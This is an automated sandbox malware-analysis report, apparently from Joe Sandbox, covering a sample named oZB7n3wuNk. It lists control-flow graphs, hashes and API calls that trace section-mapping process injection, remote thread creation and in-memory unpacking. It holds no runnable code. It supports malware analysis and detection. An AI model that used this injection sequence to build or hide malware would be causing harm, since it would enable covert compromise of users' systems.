                                                    control_flow_graph 142 401493-4014c5 149 4014d7 142->149 150 4014cb-4014d3 142->150 149->150 151 4014da-4014ed call 40110f 149->151 150->151 154 4014f2-4014f7 151->154 155 4014ef 151->155 157 401818-401820 154->157 158 4014fd-40150e 154->158 155->154 157->154 163 401825-40184b 157->163 161 401514-40153d 158->161 162 401816 158->162 161->162 170 401543-40155a NtDuplicateObject 161->170 162->163 171 40183c-401847 163->171 172 40184e-401866 call 40110f 163->172 170->162 174 401560-401584 NtCreateSection 170->174 171->172 176 4015e0-401606 NtCreateSection 174->176 177 401586-4015a7 NtMapViewOfSection 174->177 176->162 180 40160c-401610 176->180 177->176 179 4015a9-4015c5 NtMapViewOfSection 177->179 179->176 182 4015c7-4015dd 179->182 180->162 183 401616-401637 NtMapViewOfSection 180->183 182->176 183->162 184 40163d-401659 NtMapViewOfSection 183->184 184->162 186 40165f call 401664 184->186
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                    • Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
                                                    • Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
                                                    • Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 4014aa-4014c5 196 4014d7 189->196 197 4014cb-4014d3 189->197 196->197 198 4014da-4014ed call 40110f 196->198 197->198 201 4014f2-4014f7 198->201 202 4014ef 198->202 204 401818-401820 201->204 205 4014fd-40150e 201->205 202->201 204->201 210 401825-40184b 204->210 208 401514-40153d 205->208 209 401816 205->209 208->209 217 401543-40155a NtDuplicateObject 208->217 209->210 218 40183c-401847 210->218 219 40184e-401866 call 40110f 210->219 217->209 221 401560-401584 NtCreateSection 217->221 218->219 223 4015e0-401606 NtCreateSection 221->223 224 401586-4015a7 NtMapViewOfSection 221->224 223->209 227 40160c-401610 223->227 224->223 226 4015a9-4015c5 NtMapViewOfSection 224->226 226->223 229 4015c7-4015dd 226->229 227->209 230 401616-401637 NtMapViewOfSection 227->230 229->223 230->209 231 40163d-401659 NtMapViewOfSection 230->231 231->209 233 40165f call 401664 231->233
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                    • Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
                                                    • Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
                                                    • Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 236 4014b1-4014ed call 40110f 241 4014f2-4014f7 236->241 242 4014ef 236->242 244 401818-401820 241->244 245 4014fd-40150e 241->245 242->241 244->241 250 401825-40184b 244->250 248 401514-40153d 245->248 249 401816 245->249 248->249 257 401543-40155a NtDuplicateObject 248->257 249->250 258 40183c-401847 250->258 259 40184e-401866 call 40110f 250->259 257->249 261 401560-401584 NtCreateSection 257->261 258->259 263 4015e0-401606 NtCreateSection 261->263 264 401586-4015a7 NtMapViewOfSection 261->264 263->249 267 40160c-401610 263->267 264->263 266 4015a9-4015c5 NtMapViewOfSection 264->266 266->263 269 4015c7-4015dd 266->269 267->249 270 401616-401637 NtMapViewOfSection 267->270 269->263 270->249 271 40163d-401659 NtMapViewOfSection 270->271 271->249 273 40165f call 401664 271->273
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                    • Instruction ID: 77e294e5c29794052b934d18963121443c47762038f294bdc3221756e3d7f28a
                                                    • Opcode Fuzzy Hash: 2742df03783a4af2630757ed973f661598ad208167d61c6187633747a4b73a2d
                                                    • Instruction Fuzzy Hash: 74512C71900209BFEF209F91CC49FEFBBB8EF85B00F104159F951AA2A5E7B09941CB24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 276 4014ad-4014c5 281 4014d7 276->281 282 4014cb-4014d3 276->282 281->282 283 4014da-4014ed call 40110f 281->283 282->283 286 4014f2-4014f7 283->286 287 4014ef 283->287 289 401818-401820 286->289 290 4014fd-40150e 286->290 287->286 289->286 295 401825-40184b 289->295 293 401514-40153d 290->293 294 401816 290->294 293->294 302 401543-40155a NtDuplicateObject 293->302 294->295 303 40183c-401847 295->303 304 40184e-401866 call 40110f 295->304 302->294 306 401560-401584 NtCreateSection 302->306 303->304 308 4015e0-401606 NtCreateSection 306->308 309 401586-4015a7 NtMapViewOfSection 306->309 308->294 312 40160c-401610 308->312 309->308 311 4015a9-4015c5 NtMapViewOfSection 309->311 311->308 314 4015c7-4015dd 311->314 312->294 315 401616-401637 NtMapViewOfSection 312->315 314->308 315->294 316 40163d-401659 NtMapViewOfSection 315->316 316->294 318 40165f call 401664 316->318
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                    • Instruction ID: d83691bfaa908ebf768f39752e331a6567bad0fa9e9ed4c6933609491a97c617
                                                    • Opcode Fuzzy Hash: c2d055a4891878af715572554fd1d714be86d732ae2eeb963f093206d5304122
                                                    • Instruction Fuzzy Hash: 0B512B71900245BBEB209F91CC49FAF7BB8EF85B00F104129FA51BA2E5E6B49941CB64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 321 4014d5-4014ed call 40110f 325 4014f2-4014f7 321->325 326 4014ef 321->326 328 401818-401820 325->328 329 4014fd-40150e 325->329 326->325 328->325 334 401825-40184b 328->334 332 401514-40153d 329->332 333 401816 329->333 332->333 341 401543-40155a NtDuplicateObject 332->341 333->334 342 40183c-401847 334->342 343 40184e-401866 call 40110f 334->343 341->333 345 401560-401584 NtCreateSection 341->345 342->343 347 4015e0-401606 NtCreateSection 345->347 348 401586-4015a7 NtMapViewOfSection 345->348 347->333 351 40160c-401610 347->351 348->347 350 4015a9-4015c5 NtMapViewOfSection 348->350 350->347 353 4015c7-4015dd 350->353 351->333 354 401616-401637 NtMapViewOfSection 351->354 353->347 354->333 355 40163d-401659 NtMapViewOfSection 354->355 355->333 357 40165f call 401664 355->357
                                                    APIs
                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: Section$View$Create$DuplicateObject
                                                    • String ID:
                                                    • API String ID: 1546783058-0
                                                    • Opcode ID: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                    • Instruction ID: fd495a3767c54d0d9857a4c92bec852555a579275bcd6122a58bb2fbabb6e282
                                                    • Opcode Fuzzy Hash: c96008d8cce7321b8157e43aa0d4653c0fe8b81337c4837ab356279a75588f9b
                                                    • Instruction Fuzzy Hash: EF510A71900209BFEF209F91CC49FEFBBB8EF85B10F104159F911AA2A5E7B09941CB24

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 360 402f55-402f79 361 4030ac-4030b1 360->361 362 402f7f-402f97 360->362 362->361 363 402f9d-402fae 362->363 364 402fb0-402fb9 363->364 365 402fbe-402fcc 364->365 365->365 366 402fce-402fd5 365->366 367 402ff7-402ffe 366->367 368 402fd7-402ff6 366->368 369 403020-403023 367->369 370 403000-40301f 367->370 368->367 371 403025-403028 369->371 372 40302c 369->372 370->369 371->372 373 40302a 371->373 372->364 374 40302e-403033 372->374 373->374 374->361 375 403035-403038 374->375 375->361 376 40303a-4030a9 RtlCreateUserThread NtTerminateProcess 375->376 376->361
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateProcessTerminateThreadUser
                                                    • String ID:
                                                    • API String ID: 1921587553-0
                                                    • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                    • Instruction ID: 385db6ec30348a4611532b2edd8baef849cc63295ecf85ab64ace8f86e30940b
                                                    • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                    • Instruction Fuzzy Hash: D9413731218E098FD768EF6CA845B6277D1F798311F6643AAE809D3389EA34DC1183C5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 378 64ac68-64ac81 379 64ac83-64ac85 378->379 380 64ac87 379->380 381 64ac8c-64ac98 CreateToolhelp32Snapshot 379->381 380->381 382 64aca8-64acb5 Module32First 381->382 383 64ac9a-64aca0 381->383 384 64acb7-64acb8 call 64a927 382->384 385 64acbe-64acc6 382->385 383->382 389 64aca2-64aca6 383->389 390 64acbd 384->390 389->379 389->382 390->385
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0064AC90
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 0064ACB0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 4aa5c45356edc7bfd1841777032938d6ff15b3d0f83178ed083fe18b899096cd
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 42F09032240714BBD7603BF9A9CDBAE76EEBF49725F100628E642D21C0DB70EC454A62

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 394 4030b2-4030d0 396 4030d3-4030fc 394->396 397 403094-4030b1 NtTerminateProcess 394->397 401 403104-403109 396->401 402 4030fe 396->402 404 403112-403134 call 40118b 401->404 405 40310b 401->405 402->401 403 403100-403102 402->403 411 403138 404->411 405->404 406 40310d-403110 405->406 406->404 411->411
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: ProcessTerminate
                                                    • String ID:
                                                    • API String ID: 560597551-0
                                                    • Opcode ID: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                    • Instruction ID: 842373eb4463ac9e834e9e22d1360699520a6be1e431551352f4b65e49395860
                                                    • Opcode Fuzzy Hash: 65859489a4ee9faed147b0567641968f4d00accd6ffd6793ae8748d9f8272d5d
                                                    • Instruction Fuzzy Hash: BA018E3360D01556C71C9A7848012F56F56D784321F34413BE1566B5D7D63E8A0B5587

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 7a003c-7a0047 1 7a0049 0->1 2 7a004c-7a0263 call 7a0a3f call 7a0e0f call 7a0d90 VirtualAlloc 0->2 1->2 17 7a028b-7a0292 2->17 18 7a0265-7a0289 call 7a0a69 2->18 20 7a02a1-7a02b0 17->20 22 7a02ce-7a03c2 VirtualProtect call 7a0cce call 7a0ce7 18->22 20->22 23 7a02b2-7a02cc 20->23 29 7a03d1-7a03e0 22->29 23->20 30 7a0439-7a04b8 VirtualFree 29->30 31 7a03e2-7a0437 call 7a0ce7 29->31 32 7a04be-7a04cd 30->32 33 7a05f4-7a05fe 30->33 31->29 35 7a04d3-7a04dd 32->35 36 7a077f-7a0789 33->36 37 7a0604-7a060d 33->37 35->33 40 7a04e3-7a0505 35->40 41 7a078b-7a07a3 36->41 42 7a07a6-7a07b0 36->42 37->36 43 7a0613-7a0637 37->43 51 7a0517-7a0520 40->51 52 7a0507-7a0515 40->52 41->42 44 7a086e-7a08be LoadLibraryA 42->44 45 7a07b6-7a07cb 42->45 46 7a063e-7a0648 43->46 50 7a08c7-7a08f9 44->50 48 7a07d2-7a07d5 45->48 46->36 49 7a064e-7a065a 46->49 53 7a07d7-7a07e0 48->53 54 7a0824-7a0833 48->54 49->36 55 7a0660-7a066a 49->55 56 7a08fb-7a0901 50->56 57 7a0902-7a091d 50->57 58 7a0526-7a0547 51->58 52->58 59 7a07e2 53->59 60 7a07e4-7a0822 53->60 62 7a0839-7a083c 54->62 61 7a067a-7a0689 55->61 56->57 63 7a054d-7a0550 58->63 59->54 60->48 64 7a068f-7a06b2 61->64 65 7a0750-7a077a 61->65 62->44 66 7a083e-7a0847 62->66 68 7a05e0-7a05ef 63->68 69 7a0556-7a056b 63->69 70 7a06ef-7a06fc 64->70 71 7a06b4-7a06ed 64->71 65->46 72 7a084b-7a086c 66->72 73 7a0849 66->73 68->35 76 7a056f-7a057a 69->76 77 7a056d 69->77 74 7a074b 70->74 75 7a06fe-7a0748 70->75 71->70 72->62 73->44 74->61 75->74 80 7a059b-7a05bb 76->80 81 7a057c-7a0599 76->81 77->68 84 7a05bd-7a05db 80->84 81->84 84->63
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 007A024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: cc6d5921154b78107d5c505add64502630adb7c0d8fbae98864914a037feabd1
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 4E528874A01229DFDB64CF68C984BA8BBB1BF09304F1485D9E80DAB351DB34AE94DF54

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 391 7a0e0f-7a0e24 SetErrorMode * 2 392 7a0e2b-7a0e2c 391->392 393 7a0e26 391->393 393->392
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00000400,?,?,007A0223,?,?), ref: 007A0E19
                                                    • SetErrorMode.KERNELBASE(00000000,?,?,007A0223,?,?), ref: 007A0E1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7a0000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction ID: 60cb3f40b0b8b15a525da7d8e95f9786b204af80b7b2fad890f04ce13a54c87c
                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                    • Instruction Fuzzy Hash: 44D0123114512877DB003B94DC09BCD7B1CDF09B62F008411FB0DD9080C774994046E5

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 412 401869-4018cc call 40110f Sleep call 40138a 426 4018db-40192a call 40110f 412->426 427 4018ce-4018d6 call 401493 412->427 427->426
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                    • Instruction ID: c749d285b2de24fc316c817c7ae4fe8e6badb8f794917fcf5296f62f9050bee9
                                                    • Opcode Fuzzy Hash: d06a35291f3f8f1a67eb92b1a4d5f56442e5df8eca4c3459f494d6ac572ad673
                                                    • Instruction Fuzzy Hash: BA117C72A0C208EBE600BA949C42E7A3259AB41755F348037BA07790F0D67D9B13B72B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 441 401874-4018cc call 40110f Sleep call 40138a 450 4018db-40192a call 40110f 441->450 451 4018ce-4018d6 call 401493 441->451 451->450
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                    • Instruction ID: b17aa293f10861f930621d71b3cc53cbab5e3b4d2edd5f2ed28ca100fb2eaa3d
                                                    • Opcode Fuzzy Hash: 68152553fbf31f958f2666c8c24b9d96b65cdd3abd047d41b0fcf87566074689
                                                    • Instruction Fuzzy Hash: 2C010472A0C245EBEB00ABA09C4297933659F00305F248477B606790F1D57D8712F71B

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 465 401894-4018cc call 40110f Sleep call 40138a 476 4018db-40192a call 40110f 465->476 477 4018ce-4018d6 call 401493 465->477 477->476
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                    • Instruction ID: b8c0f1a70be89906461d65cd061911ad83e0312d7227b68f91b7eb194a97aeae
                                                    • Opcode Fuzzy Hash: cf92e4b68736d476fd27c40767b4ebefb699700f173f159b6ae110c0fcf0c166
                                                    • Instruction Fuzzy Hash: CA015A7260C205EBEB01AA909C42A7A3215AB45355F248437BA17790F1C67D8A53F71B
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0064A978
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Offset: 00638000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_638000_oZB7n3wuNk.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction ID: 5c9746cdfe595740576ce98cefe06f8a92bb7279f4a14d206e4ba7f77a62acd1
                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                    • Instruction Fuzzy Hash: 2D113C79A40208FFDB01DF98C985E98BBF5AF08350F058094FA489B362D371EA50DF85

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 491 401898-4018cc call 40110f Sleep call 40138a 500 4018db-40192a call 40110f 491->500 501 4018ce-4018d6 call 401493 491->501 501->500
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
                                                    • Opcode ID: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                    • Instruction ID: be550ea8b7a21d6326383ffce51d2b737e5c9e0a4d996b68b29bd2ffee87f150
                                                    • Opcode Fuzzy Hash: 214e81ffa9f270bed09b0236bf8c9fa2ab7398f4e2a2ef32b27fb06c8532a1cd
                                                    • Instruction Fuzzy Hash: 32014F7260C205EBEB01AA909D41A7E3255AF45315F248437BA17790F1C67D8653F71B
                                                    APIs
                                                    • Sleep.KERNELBASE(00001388), ref: 004018B7
                                                      • Part of subcall function 00401493: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
                                                      • Part of subcall function 00401493: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd
                                                    Similarity
                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                    • String ID:
                                                    • API String ID: 4152845823-0
